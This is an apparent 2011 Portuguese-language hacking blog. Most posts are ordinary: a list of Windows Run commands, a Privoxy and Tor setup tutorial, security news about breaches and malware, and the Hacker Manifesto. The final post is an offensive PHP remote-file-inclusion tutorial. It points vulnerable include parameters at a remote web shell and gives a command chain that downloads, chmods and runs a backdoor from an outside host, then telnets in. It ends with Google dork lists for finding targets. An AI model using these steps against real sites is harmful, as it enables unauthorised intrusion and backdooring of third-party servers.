Pages

terça-feira, 24 de maio de 2011

1
Comandos para usar no Executar do Windows.

Accwiz.exe - Acessa o Assistente de Acessibilidade
Calc.exe - Executa o programa Calculadora
Charmap.exe - Executa o Mapa de Caracteres
ChkDsk.exe - Executa o Scandisk em ambiente simulado DOS
CleanMgr.exe - Executa a Limpeza de Disco
CliconFg.exe - Executa o utilidade Rede para clientes do SQL Server
CMD.exe - Executa o Prompt de Comando do DOS
Control.exe - Acessa o Painel de Controle
DxDiag.exe - Ferramenta de Diagnóstico do Direct X
EudCedit.exe - Executa Editor de caracteres especiais
Explorer.exe - Acessa o Windows Explorer
Magnify.exe - Executa a Lente de aumento do Windows XP
Mspaint.exe - Executa o Paint Brush
MsHearts.exe - Executa o Jogo de Copas
Mstsc.exe - Abre a janela para conexão de área de trabalho Remota
MSconfig.exe - Utilitário de configuração do Sistema
Notepad.exe - Acessa o Bloco de Notas
NetSetup.exe - Executa o Assistente para configuração de rede doméstica
Ntbackup.exe - Assistente para Backup e restauração
Osk.exe - Executa o teclado Virtual
PergMon.exe - Gerenciador de Desempenho do Windows XP
Regedit.exe - Acessa o ambiente de exploração do registro do Windows
Rstrui.exe - Executa o Assistente para restauração do Sistema
Sol.exe - Executa o Jogo Paciência
Spider.exe - Executa o Jogo Spider
Telnet.exe - Acessa o ambiente DOS possibilitando a comunicação Remota
TaskMgr.exe - Gerenciador de Tarefas do Windows
Winchat.exe - Bate Papo do Windows
Write.exe - Wordpad do Windows
Ferramentas Administrativas
gpedit.msc - Diretivas de Grupos
perfmon.msc - Serviço de componentes
compmgmt.msc - Gerenciamento do Computador
services.msc - Serviços
secpol.msc - Diretiva de Segunça Local
comexp.msc - Serviços de Componentes
odbcad32.exe - Fontes de Dados (ODBC)

Assistente de controles => access.cpl
Assistente de acessibilidade => accwiz
Adicionar novo hardware => hdwwiz.cpl
Adicionar/Remover programas => appwiz.cpl
Ferramentas Admnistrativas => control admintools
Adobe Acrobat (Executar se instalado ) => acrobat
Adobe Designer (Executar se instalado ) => acrodist
Adobe Distiller (Executar se instalado ) => acrodist
Adobe ImageReady (Executar se instalado ) => imageready

Adobe Photoshop (Executar se instalado ) => photoshop
Atualizações automáticas => wuaucpl.cpl
Assistente para transferência BlueTooth => fsquirt
Calculadora => calc
Gerenciador de Certeficados => certmgr.msc
Mapa de caracteres => charmap
Check Disk Utility => chkdsk
Visualizador da área de armazenamento => clipbrd
Janela de comandos DOS => cmd
Serviços de Componentes => dcomcnfg
Gerenciamento do computador => compmgmt.msc
Painel de Controle => control
Propriedades de data e tempo => timedate.cpl
DDE Shares => ddeshare
Gerenciamento de dispositivos => devmgmt.msc
Direct X Control Panel (Se instalado )* => directx.cpl
Direct X Troubleshooter => dxdiag
Limpeza de Disco => cleanmgr
Desfragmentador de Discos => dfrg.msc
Gerenciamento de Discos => diskmgmt.msc
Gerenciamento de partição de Discos => diskpart
Propriedades de Vídeo => control desktop
Propriedades de Vídeo => desk.cpl
Propriedades de Vídeo (aparência) => control color
Dr. Watson System Troubleshooting Utility => drwtsn32
Driver Verifier Utility => verifier
Event Viewer => eventvwr.msc
Assistente para transferência de arquivos e informações => migwiz
Verificação de assinatura de arquivo => sigverif
Busca rápida => findfast.cpl
Firefox (Executar se instalado ) => firefox
Propriedades de pasas => control folders
Fonts => control fonts
Fonts (Pasta) => fonts
Jogo FreeCell => freecell
Controle para Jogos => joy.cpl
Group Policy Editor (XP Prof) => gpedit.msc
Jogo de cartas => mshearts
Ajuda e suporte => helpctr
HyperTerminal => hypertrm
Iexpress Wizard => iexpress
Indexing Service => ciadv.msc
Internet Connection Wizard => icwconn1
Internet Explorer => iexplore
Propriedades da Internet => inetcpl.cpl
Suporte a Configurações da Internet => inetwiz
Configuração de protocolo de Internet( Visualizar tudo) => ipconfig /all
Configuração de protocolo de Internet(Visualizar DNS ) => ipconfig /displaydns
Configuração de protocolo de Internet (Deletar informações de DNS ) => ipconfig /flushdns
Configuração de protocolo de Internet (Todas as conexões ) => ipconfig /release
IP Configuration (Renovar Conexões ) => ipconfig /renew
IP Configuration (Atualizar DHCP & Re-Registers DNS) => ipconfig /registerdns
IP Configuration (Visualizar DHCP Class ID) => ipconfig /showclassid
IP Configuration (Modificar DHCP Class ID) => ipconfig /setclassid
Painel de controle Java (Executar se instalado ) => jpicpl32.cpl
Painel de controle Java (Executar se instalado ) => javaws
Propriedades do teclado => control keyboard
Configurações de segurança => secpol.msc
Usuários e Grupos locais => lusrmgr.msc
Fazer Logoff do Windows => logoff

Software para retirar Malware´s (fraco) => mrt
Microsoft Access (Executar se instalado ) => access.cpl
Microsoft Chat (Bate-papo, alguém usa isso? ) => winchat
Microsoft Excel (Executar se instalado ) => excel
Microsoft Frontpage (Executar se instalado ) => frontpg
Microsoft Movie Maker (Ferramenta para edição de filmes caseiros) => moviemk
Microsoft Paint (Famoso Paint Brushe ) => mspaint
Microsoft Powerpoint (Executar se instalado ) => powerpnt
Microsoft Word (Executar se instalado ) => winword
Ferramenta para Sincornização => mobsync
Minesweeper Game (Jogo " Mina ") => winmine
Propriedades do Mouse => control mouse
Propriedades do Mouse => main.cpl
Nero (Executar se instalado ) => nero
Netmeeting (Sofwtare para comunicação, utilizado geralmente em empresas de pequeno porte ) => conf
Conexões de rede => control netconnections
Conexões de rede => ncpa.cpl
Setupe de Conexões de rede => netsetup.cpl
Bloco de notas => notepad
Nview Desktop Manager (Executar se instalado ) => nvtuicpl.cpl
Gerenciador de Objetos => packager
Administrador de fontes de dados ODBC => odbccp32.cpl
Teclado virtual => osk
Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl
Outlook Express => msimn
Paint => pbrush
Propriedades de senha => password.cpl
Ajustar Monitor => perfmon.msc
Ajustar Monitor => perfmon
Opções de telefone e modem => telephon.cpl
Discador => dialer
Pinball Game => pinball
Propriedades de opções de energia => powercfg.cpl
Impressoras e Faxes => control printers
Pasta de impressoras => printers
Editor de characteres particulares (algúem conhece isso?) => eudcedit
Quicktime (Se instalado ) => QuickTime.cpl
Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer
Real Player (Se instalado Executar o Real player ) => realplay
Configurações regionais => intl.cpl
Editor de Registros => regedit
Editor de Registros => regedit32
Catalogo Telefonico => rasphone
Conectar a Desktop Remoto através de um Host ou IP => mstsc
Armazenamento removível => ntmsmgr.msc
Solicitação do operador de armazenamento removível => ntmsoprq.msc
Consulta de diretivas resultantes => rsop.msc
Assistente de Cameras e Scanners => sticpl.cpl
Tarefas Agendadas => control schedtasks
Centro de segurança do Windows => wscui.cpl
Serviços => services.msc
Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl
Outlook Express => msimn
Paint => pbrush
Propriedades de senha => password.cpl
Ajustar Monitor => perfmon.msc
Ajustar Monitor => perfmon
Opções de telefone e modem => telephon.cpl
Discador => dialer
Pinball Game => pinball
Propriedades de opções de energia => powercfg.cpl
Impressoras e Faxes => control printers
Pasta de impressoras => printers
Editor de characteres particulares (algúem conhece isso?) => eudcedit
Quicktime (Se instalado ) => QuickTime.cpl
Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer
Real Player (Se instalado Executar o Real player ) => realplay
Configurações regionais => intl.cpl
Editor de Registros => regedit
Editor de Registros => regedit32
Catalogo Telefonico => rasphone
Conectar a Desktop Remoto através de um Host ou IP => mstsc
Armazenamento removível => ntmsmgr.msc
Solicitação do operador de armazenamento removível => ntmsoprq.msc
Consulta de diretivas resultantes => rsop.msc
Assistente de Cameras e Scanners => sticpl.cpl
Tarefas Agendadas => control schedtasks
Centro de segurança do Windows => wscui.cpl
Serviços => services.msc

1
Privoxy + TOR (Ganhando o anonimato na internet)

Bom pessoal, resolvi criar mais um tutorial, so que agora sobre um assunto mais importante ^^
Irei explicar como configurar e rodar um Proxy junto ao TOR! Com a finalidade de ganhar o anonimato ^^

Vamos ver qual é o nosso IP antes de tudo, só para notar a alteração ^^
Para ver o ip: link -> http://meuip.com.br/

Baixe o pacote de programas necessírio! o Link é:
https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.24-alpha-0.2.12.exe

3º Passo: Após termos instalado, vamos configurar o PRIVOXY

Vamos entrar na pasta onde foi instalado o PRIVOXY e [ABRIR] o arquivo [ config.txt ]

Vamos puchar a barra de rolagem até o final do arquivo, e [INSERIR] a linha forward-socks4a / 127.0.0.1:9050 .
logo abaixo da linha #hide-console
Não esqueça do ponto no fim da linha!

salve as alterações em ARQUIVO > SALVAR! e feche o arquivo!



Agora vamos configurar nossos Navegadores para o proxy!

*** No caso do IE (Internet Explorer)

- Abra uma pígina do IE:

- Entre em FERRAMENTAS > OPÇÕES DA INTERNET:

Acione a guia [CONEXÕES]

- Entre no botão [CONFIGURAÇÕES]

Ative as opções [Usar um servidor proxy...] e [Não usar proxy para...]

Ainda acione o botão [AVANÇADO]
OK > OK > OK e pronto configuramos para o IE!



No caso do FireFox:

É necessírio o download de um PLUGIN: link -> https://addons.mozilla.org/firefox/125/

Após a instalação!

- Abra o navegador e click no botão [ADD]
Na tela de seleção do tipo de Proxy, ecolha a opção STANDARD e click no botão [NEXT]
Agora configure a janela
Pronto configuramos o FireFOX.

feito isso, siga as instruçoes:
__________________________________________________ ________
Abra o TOR! e espere carregar
Abra o PRIVOXY! logo após minimize!
vamos entrar no link abaixo e ver se nosso IP mudou! link -> http://ipid.shat.net




Para voltar a utilizar a conexão sem o proxy...

*** No caso do IE:

- Abra o navegador - FERRAMENTAS > OPÇÕES DA INTERNET > COINEXàO > CONFIGURAÇÔES e desative [Usar um servidor proxy...]

*** No caso do Firefox:

- Desative a conexão do proxy... pelo navegador!

Tuto By: 4TT4Ck3r
segunda-feira, 16 de maio de 2011

0
Hackers invadem site de produtora de games Square Enix e roubam 25 mil e-mails.

Uma invasão a sites da Square Enix pode ter resultado no roubo de 25 mil endereços de e-mail e 350 currículos a vagas de emprego na empresa, informou a companhia. Os sites do game Deux Ex e da Eidos Montreal foram comprometidos e hackers “picharam” as páginas, deixando mensagens identificando o grupo responsável como “Chippy1337”.

Os responsáveis, porém, seriam uma facção descontente do grupo que recentemente invadiu servidores usados pelo Anonymous. Eles seriam simpatizantes do Anonymous, contrários à invasão dos servidores do “grupo” anônimo, e, por isso, estariam atribuindo a invasão aos seus antigos “colegas”.

Na mensagem deixada na página, os invasores escreveram “hackeado por...” seguido de diversos “nicknames” junto de nomes reais, numa tentativa de atribuir o ataque a pessoas que não tiveram relação com ele.

O jornalista Brian Krebs obteve o que pode ser um registro da troca de mensagens entre os hackers enquanto realizavam a invasão aos sites da Square Enix e também a quem o ataque seria falsamente atribuído. Eles usavam os nicknames “nigg”, “e” e “ev0”.

Segundo a Square Enix, os endereços de e-mail não estavam ligados a nenhuma outra informação pessoal, diferentemente do caso da Playstation Network em que também foram roubados nomes, endereços físicos e outras informações pessoais. Apenas as informações dos candidatos que enviaram currículos estariam completas.

A Square Enix disse já estar tentando informar as pessoas que podem vir a sofrer ataques por e-mail devido à invasão.


Fonte: G1
terça-feira, 10 de maio de 2011

1
Falso Antivirus para Mac diz que o computador esta infectado.

Empresas de segurança estão alertando para duas novas ameaças para computadores Macintosh, da Apple, com o sistema MacOS X: o antivírus fraudulento “MAC Defender” e um kit para criação de pragas digitais. Os códigos maliciosos funcionam exatamente como os de Windows. O MAC Defender está sendo disseminado junto com os ataques à computadores Windows usando a morte de Osama bin Laden.

O antivírus fraudulento, descoberto pelas empresas de segurança Intego e Kaspersky, funciona exatamente como as pragas semelhantes para Windows. Ele afirma que o computador está infectado e que pode realizar uma limpeza, mas somente se o programa for comprado por, no mínimo, US$ 60. No entanto, o próprio “antivírus” é a praga e as detecções são falsas ou relacionadas a arquivos que ele mesmo criou no sistema.

O usuário pode ser infectado ao procurar imagens de Osama bin Laden em sites de busca. O líder terrorista foi morto neste domingo (1º) em uma operação do exército norte-americano. Usando uma função no Safari conhecida como “Open safe files after downloading”, o arquivo malicioso é capaz de se baixar e executar sozinho, embora ainda precise de permissão do usuário para se instalar. A função é conhecida por ter problemas de segurança desde 2006, mas não foi removida do navegador.

Um golpe semelhante para Mac foi encontrado em 2008, mas a interface gráfica do programa era diferente. O nome “Mac Defender” também é usado por uma empresa, que afirmou não ter nenhuma relação com a praga virtual.


Kit de criação de vírus
A empresa de segurança dinamarquesa CSIS anunciou a descoberta de um possível kit de criação de vírus para MacOS X chamado Weyland-Yutani. O kit consegue criar códigos maliciosos capazes de roubar senhas do Firefox; funções para o Safari devem ser lançadas “em breve”. Segundo a CSIS, os criminosos prometeram versões do mesmo kit para iPad e Linux. O kit estaria sendo vendido por US$ 1 mil.

Considerado livre de vírus durante muito tempo, a primeira praga virtual para MacOS X surgiu só em 2006. Em 2007, o primeiro vírus com intuito financeiro para a plataforma apareceu e foi batizado de RSPlug. Desde então, outras pragas digitais capazes de atacar computadores da Apple aparecem regularmente, embora em número incomparavelmente inferior ao de Windows.

0
Hackers Chineses invadem rede elétrica da Letônia

Um indivíduo usando o nome “Zhang Xinghu” publicou relatos de uma invasão a uma termoelétrica da Letônia operada pela empresa de energia Latvenergo. Ele afirma fazer parte da “Aliança de Hackers Jovens da China” e tentou comprovar seu feito publicando diversas capturas de tela do suposto sistema de controle da usina Riga TEC-2.
sexta-feira, 6 de maio de 2011

1
Vírus no Facebook promete mostrar imagem do usuário no futuro

Esta semana, uma nova praga começou a se espalhar por entre os perfis do Facebook. O anúncio, semelhante aos enviados por aplicativos comuns da rede social, promete mostrar ao usuário uma imagem de como será sua aparência no futuro.

O site de origem do convite é identificado como “jvaging2.info”, e a mensagem acompanha a frase “esta tecnologia de ponto vai lhe mostrar exatamente como sua face ficará no futuro”. Ao clicar no link enviado, o usuário abre as portas para que o vírus se dissemine automaticamente por toda a sua rede de contatos.

Como forma de atrair a atenção das possíveis vítimas, o aplicativo também incluiu a frase “hahah, a minha é hilária!!! Confira a sua :)”, identificada como se fosse um comentário do usuário infectado. Todas as informações são exibidas em inglês, o que facilita a identificação daqueles contaminados.

Até o momento, a praga se limitou a simplesmente se reproduzir através do envio automático de mensagens. Porém, há a possibilidade de que ela comprometa dados pessoais do usuário, incluindo a senha de acesso utilizada.



Leia mais no Baixaki.
quinta-feira, 28 de abril de 2011

0
Formspring é 'central de comando' de novo vírus brasileiro


A rede social Formspring, que permite aos usuários criarem páginas para que outros internautas perguntem qualquer coisa, está sendo usada como centro de controle por vírus brasileiros programados para roubar senhas de banco. A descoberta é do analista de vírus Fabio Assolini, da Kaspersky Lab.
Os comandos na página maliciosa do Formspring estão codificados e não causam nenhum dano ao internauta que vê o perfil – o objetivo é simplesmente servir de ponto de controle para o vírus. Para a maioria das pessoas, os comandos são incompreensíveis. “Quem vê o conteúdo no perfil malicioso não imagina o que pode ser e isso faz com que o perfil fique mais tempo online”, explica Assolini.
Os códigos deixados pelos criminosos nas páginas do Formspring são principalmente endereços dos quais o vírus deve baixar componentes adicionais – “módulos” que acrescentam funções ou modificam o comportamento da praga para mantê-la atualizada. Outra informação que pode ser enviada ao vírus pelo Formspring é o endereço do banco de dados para o qual o vírus deve enviar as informações bancárias coletadas.
Um contador que registra o número de pessoas infectadas pela praga também é acionado pelos comandos.
O analista da Kaspersky afirma que há vantagens para os criminosos usarem o Formspring: o serviço é gratuito, não cai com frequência e, como os comandos estão codificados, ficarão lá por bastante tempo. Mas o novo comportamento do vírus é reflexo de uma tendência. “Os criminosos digitais brasileiros estão percebendo que ter total controle sobre a praga e sobre a máquina da vítima por um longo tempo é mais lucrativo do que simplesmente infectar e roubar os dados apenas uma vez”.
Assolini ainda pensa que, no futuro, os vírus brasileiros também irão formar redes zumbis – uma prática mais comum em outros países da América Latina do que no Brasil.
Procurado pela reportagem, o Formspring ainda não informou se está ciente dos vírus que usam seu serviço como centro de controle. Vale observar, porém, que uso do serviço dessa forma pelos criminosos não torna o uso da rede social mais perigoso – é apenas uma facilidade para os programadores de vírus, que não precisam manter sua própria infraestrutura de controle.
Uso de redes sociais como centro de comando
Pragas brasileiras já usaram outras redes sociais como centro de comando. A prática foi registrada pela primeira vez em 2009 no Twitter, quando perfis maliciosos eram abastecidos com tuites codificados que traziam os comandos para o vírus.
Assim como o trojan que usa o Formspring, essa praga acessava o perfil no Twitter para buscar atualizações e instruções do seu criador.

Fonte: G1
segunda-feira, 25 de abril de 2011

1
Hacker, Geek, Nerd... Hein?

O artigo foi tirado do GlobalExchange.com, escrito por Christian Matsuy:

- Você trabalha com que?
- Sou Administrador de Rede.
- Hein?
- Trabalho com informática...
- Sério? Você é "hacker"
- "Hacker" Depende... O que é "hacker" pra você?
- São aqueles caras que invadem e ferram os computadores dos outros...
- Ah tá... Sou sim...

Parece piada não é? Mas não é não... Isso acontece direto comigo e com muitos que trabalham com informática.

Mas... Espera um pouco... Isso não está certo...

Você tem noção do que está falando? Sabe mesmo o que é um "hacker"? Pare agora e responda pra você mesmo o que é um "hacker"?

Resolvi escrever este artigo pois, nos dias de hoje, o termo "hacker" ganhou, graças a uma opinião pública predominantemente moldada pela mídia, uma conotação totalmente negativa, que pode nem sempre corresponder à realidade.

O sentido comum que damos a este termo (próprio do final do século XX) nos remete a um universo obscuro, onde impera aquilo que é ilegal, proibido, e onde supostamente encontramos grupos de indivíduos que se dedicam à estranha atividade de invadir a privacidade dos usuários de computador e empresas, cometerem furtos e provocar danos (em vários níveis) através de sistemas.

Este conceito distorcido da realidade levou o termo "hacker" a tornar-se uma denominação geral que reporta a todos os delinqüentes de informática, sem que se leve em conta quaisquer parâmetros de quais sejam os objetivos e as formas de atuação destes indivíduos. Desta forma, tende-se a generalizar os chamados "piratas cibernéticos" com a denominação "hacker", o que criou um clima desconfortável, publicado em vários sites na Internet em forma de protesto por aqueles que afirmam ser os verdadeiros "hackers".

Então, o que é um "Hacker"?
"Hacker" é uma palavra inglesa que não possui tradução exata para a língua portuguesa. O mais próximo que conseguimos chegar ao traduzi-la seria "fuçador" ou "aquele que aprende fuçando". O sentido da palavra é muito próximo a outro termo, "autodidata", mas não é exatamente isto, já que o "fuçador" vai bem mais longe que o autodidata, pois existe a curiosidade em descobrir como dominar tudo, buscando o conhecimento das falhas dos sistemas, depois como usá-las para burlar proteções, e depois como "consertá-las".

No mundo real qualquer um de nós pode ser considerado "hacker" em alguma coisa: Basta pensarmos naquilo que resolvemos por conta própria, quando somos "curiosos" e procuramos entender a origem do problema (até após a leitura de literaturas específicas) e vamos pelo método de tentativa e erro. Nós sabemos que a tentativa e erro é a forma mais demorada para se resolver problemas, mas sem dúvida é a melhor, pois nos leva a compreender processos "ocultos" que seriam desconhecidos ou não seriam ensinados em livros e nem mesmo por outras pessoas.

Portanto ninguém se torna um "hacker" de uma hora pra outra. Quando pensamos que no mundo real muitos deles nunca terão acesso a um computador soa estranho, não? Sim, e vai muito além disso. Talvez "hackers" apenas sejam assim.

"Hackers" são pessoas inquietas que não são facilmente convencidas por argumentos de autoridade sem valor técnico. São céticos sempre prontos a duvidar de qualquer coisa. A simples menção de que algo é impossível para um "hacker" é um poderoso convite para que ele tente fazê-lo.

Eles querem saber mais sobre tudo, mais ainda sobre informática, simplesmente pelo fato de saber... Para muitos, obter "iluminação pessoal". Na nossa sociedade atual construíram um mundo virtual em que a única coisa que faz diferença é sua confiabilidade e sua capacidade técnica.

Esqueça a imagem do "nerd" (ou "geek", termo muito usado em informática para denominar uma pessoa com talento e interesse por tecnologia e programação acima do normal) que você possa criar na sua mente.

É verdade, alguns "hackers" são geeks (como se isso fosse algo ruim), assim como alguns não-"hackers" também são, mas de um modo geral eles são pessoas comuns, que andam como você na rua, e que falam abertamente sobre seus assuntos e interesses (muitas vezes não percebendo que os demais não estão entendendo absolutamente nada).

A diferença é que, nesse mundo, o fato de ser um geek ou não simplesmente não importa, ao contrário da sociedade de costumes, onde essas coisas tendem a ser supervalorizadas.

Filosofia à parte, vou ser mais objetivo:

É simples: Como na matemática ou na física! Você pode decorar aquelas infinitas fórmulas e, se tiver uma boa memória, vai passar em qualquer exame final. Mas você pode também deduzir de onde aquelas fórmulas saíram e o que seus criadores pensaram para chegar até elas.

Talvez você não se saia tão bem nos exames finais, mas quem aprendeu mais? O que decorou ou o que compreendeu?

0
The Hacker Manifesto - The Mentor (1986)

Mais um foi pego hoje, está em todos os jornais. "Adolescente Preso em Escândalo de Crime de Computador", "Hacker preso depois que o banco foi adulterado" ...
Malditas crianças. Eles são todos iguais.
Mas você em sua psicologia de três ângulos em 1950, sempre dar uma olhada por trás dos olhos de um hacker? Você já se perguntou o que o fazia, o que as forças lhe formam, o que pode ter moldado a ele?
Eu sou um hacker entrando no meu mundo ...
O meu é um mundo que começa na escola ... Eu sou mais esperto que a maioria dos outros garotos, alem de esta bosta que nos ensinam me chateia ...
Malditos fracassados. Eles são todos iguais.
No ensino médio e no ensino fundamental, eu ouvi os professores explicarem pela qüinquagésima vez como reduzir uma fração. Eu entendo isso. "Não, Sra. Smith, eu não mostrei o meu trabalho. Eu fiz isso na minha cabeça ..."
Maldito garoto. Provavelmente copiou. Eles são todos iguais.
Eu fiz uma descoberta hoje. Eu encontrei um computador. Espere um segundo, isso é legal. Ele faz o que eu quero. Se ele comete um erro, é porque eu estraguei isto. Não porque não gosta de mim ... Ou se sente ameaçado por mim ... Ou pensa que eu sou inteligente ... Ou não gosta de ensinar e não deveria estar aqui ...
Maldito garoto. Tudo que ele faz é jogar. Eles são todos iguais.
E então aconteceu ... uma porta aberta para um mundo ... correndo pela linha telefônica como heroína pelas veias de um viciado, uma pulsação eletrônica é enviada, um refúgio para a incompetência do dia-a-dia é procurado ... uma placa foi encontrada. "Este é ... este é o meu lugar ..."
Eu sei que todos aqui ... mesmo se eu nunca conheci eles, nunca conversei com eles, nunca pode ouvi-los novamente ... Sei que todos vocês ...
Maldito garoto. Amarrando-se a linha telefônica novamente. Eles são todos iguais ...
Pode apostar que somos todos iguais ... temos sido alimentados com colher de comida de bebê na escola quando nossa fome é de bife ... os pedaços de carne que você deixou passar foi pre-mastigado e sem gosto. Nós fomos dominados por sádicos ou ignorados pelo apático. Os poucos que tiveram algo a ensinar os alunos dispostos nos encontraram, mas esses poucos são como gotas de água no deserto.
Este é nosso mundo agora ... o mundo do elétron e do switch, a beleza do baud. Nós fazemos uso de um serviço já existente sem pagar por aquilo que poderia ser baratíssimo se não fosse usado por gulosos aproveitadores, e vocês nos chamam de criminosos. Nós exploramos ... e vocês nos chamam de criminosos. Nós buscamos por conhecimento ... e vocês nos chamam de criminosos. Nós existimos sem cor, sem nacionalidade, sem preconceito religioso ... e vocês nos chamam de criminosos. Você constrói bombas atômicas, vocês fazem guerras, você assassina, engana, e mentem para nós e tentam nos fazer acreditar que é para nosso próprio bem, contudo nós somos os criminosos.
Sim, eu sou um criminoso. Meu crime é a curiosidade. Meu crime é julgar as pessoas pelo que elas dizem e pensam, não como eles se parecem. Meu crime é ser mais inteligente que você, algo que você nunca vai me perdoar.
Eu sou um hacker, e este é meu manifesto. Você pode parar este indivíduo, mas você não pode parar todos nós ... afinal, somos todos iguais.

O Mentor, Escrito em 8 de janeiro de 1986
segunda-feira, 18 de abril de 2011

0
FBI consegue autorização para desativar vírus em PCs de vítimas

A justiça norte-americana concedeu ao FBI uma autorização para atuar diretamente nos computadores das vítimas de uma rede zumbi conhecida como Coreflood. A autorização permite à polícia criar um novo servidor de Comando e Controle (C&C) que irá enviar aos sistemas infectados uma ordem para desativar a praga, efetivamente impedindo sua operação, pelo menos até reiniciar o PC.

Esta é apenas a segunda ação do gênero no mundo. A primeira ocorreu na Holanda, quando a polícia colocou nos PCs das vítimas uma página informando que o computador estava infectado. Na ocasião, a ação, que foi contra a rede zumbi conhecida como Bredolab, gerou polêmica – especialistas questionavam a autoridade do Estado para agir diretamente sobre os sistemas das vítimas, sem o consentimento das mesmas.

O mesmo tipo de questionamento está se fazendo agora. Mas a decisão que permite ao FBI enviar os comandos aos vírus também limita a operação aos computadores cuja localização “pode ser razoavelmente determinada como sendo os Estados Unidos”. Isso significa que nada vai mudar para os brasileiros infectados, por exemplo.

“O caso e a ordem são muito interessantes porque demonstram limitações de jurisdição”, comenta o advogado especializado em direito digital Marcel Leonardi. “Do ponto de vista prático, seria muito bom se mundialmente fosse possível alcançar todos os computadores e desativar a praga, mas isso, de fato, poderia ser visto como algo excessivo por não obedecer à soberania dos outros países”, explica.

Leonardi afirma que uma ação semelhante seria possível no Brasil, desde que também seja limitada aos computadores em território nacional. No Brasil, no entanto, os vírus mais comuns são ladrões de senha e a maioria carece de um centro de controle que pudesse ser usado para essas ações.

Para o pesquisador de segurança Ronaldo Castro de Vasconcellos, a ação é bem-vinda. “Ter uma máquina infectada deixou de ser uma questão meramente de desempenho ou de dados perdidos.

Deixando de lado analogias bobas com ciberguerra, de alguns anos para cá, uma máquina infectada ganhou capacidade ofensiva, como juntar-se a um ataque distribuído (DDoS) com motivações comerciais ou ideológicas, por exemplo”, afirma Vasconcellos.

Para o pesquisador, desde que a polícia tenha obtido uma ordem judicial para realizar a tarefa e que o comando enviado às máquinas infectadas se limite ao proposto – desativar o vírus – não há problema.

Há quem questione, porém, argumentando a existência de fatores imprevisíveis que podem fazer com que a desativação do vírus seja nociva ao computador. No entanto, a maioria dos bots que formam as redes zumbis – que permitem ao criminoso controlar todas as máquinas – tem, sim, uma função de autodestruição ou semelhante que muitas vezes não causa danos ao computador e é completamente funcional. Há, porém, funções de autodestruição que servem como “queima de arquivo”, eliminando todos os dados possíveis do disco rígido.

O Coreflood, no entanto, não parece ter essas características. Acredita-se que, em seus 10 anos de operação, o vírus e seus derivados tenham infectado mais de dois milhões de computadores, a maioria deles nos Estados Unidos, e realizado fraudes cujos valores somam US$ 100 milhões.

Polêmica e jurisdição

O caso destaca as limitações do atual sistema judiciário em lidar com problemas cada vez mais globais de forma local, embora também sirva como história de sucesso para novas operações no futuro.

As ações de redes zumbis são globais – um computador infectado no Brasil pode ser usado para um ataque a qualquer outro país do mundo, ou servir como escudo para o verdadeiro criminoso, complicando a realização de investigações – que precisam percorrer diferentes legislações.

No entanto, é pouco provável que isso mude em breve – a internet não parece ter criado nos países a consciência da cooperação, mas sim elevado discussões sobre soberania e o medo de que leis consideradas absurdas em outros países possam vir a valer mundialmente caso essa cooperação seja realizada, ao ponto que mesmo as ações mais bem intencionadas precisam ter seu alcance limitado.

0
Novo Domínio '.xxx' em funcionamento

Este resumo não está disponível. Clique aqui para ver a postagem.

1
Baixar arquivos a 105 Mbps ? - Sonho distante para nós Brasileiros

A Comcast Corporation, empresa de telecomunicação e entretenimento norte-americana, anunciou ontem (14) o lançamento oficial do Extreme 105 – serviço de acesso à internet de banda larga que disponibilizará 105 Mbps de velocidade em download e 10 Mbps para upload.

O pacote de conexão será comercializado, neste primeiro ano, por US$ 105 mensais. A organização começará implantando a rede nas regiões que são os seus maiores mercados. Entre as áreas contempladas, estão São Francisco, Seattle, Portland, Denver, Chicago, Miami, Washington, Filadélfia e boa parte de Boston.

A velocidade de download oferecida é muito superior à das redes brasileiras, que em média ficam próximas a 2 Mbps. Com a conexão da Comcast é possível baixar vídeos de alta definição em poucos minutos ou segundos, dependendo do tamanho do arquivo.

"Com isso, estamos alimentando a casa digital do futuro, com famílias inteiras usando vários dispositivos – computadores portáteis, consoles de jogos, comprimidos, smartphones –, permitindo que todos possam tirar proveito da alta largura de banda em aplicações simultaneamente e garantindo que cada um tenha uma ótima experiência online", comentou Cathy Avgiris, vice-presidente e gerente de comunicação e serviços de dados da empresa.



Fonte: Baixaki
quinta-feira, 14 de abril de 2011

0
O Fim das Dúvidas sobre PHP injection

Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam 'includes' para ajudar na criação do seu site sem fazer nenhuma verificação das 'strings'
Um exemplo de um site vulneravel, com 3 partes em uma tabela:

include('topo.php');
include('menu.php');
include($page);

Existem várias strings, a mais comum é page..
Então um endereço ficticio: http://www.alvo.com.br/index.php?page=novidades.php
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para 'injetar' páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

Estarei usando esse script como referencia (chamado de cmd):

http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h ... if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..

Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no 'cmd' cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h ... in;./r0nin

Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br 1666, pronto, você está na maquina, enjoy! :~)

Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:".pt" (escolhendo a classe do dominio) para procurar páginas somente de um país.

allinurl:".php?page="
allinurl:".php?inc="
allinurl:".php?body="
allinurl:".php?main="
allinurl:".php?pag="
allinurl:".php?p="
allinurl:".php?content="
allinurl:".php?cont="
allinurl:".php?c="
allinurl:".php?meio="
allinurl:".php?x="
allinurl:".php?cat="
allinurl:".php?site="
allinurl:".php?m="
allinurl:".php?do="
allinurl:".php?x="
allinurl:".php?content="
allinurl:".php?pagina="
allinurl:".php?root="
allinurl:".php?include="
allinurl:".php?open="
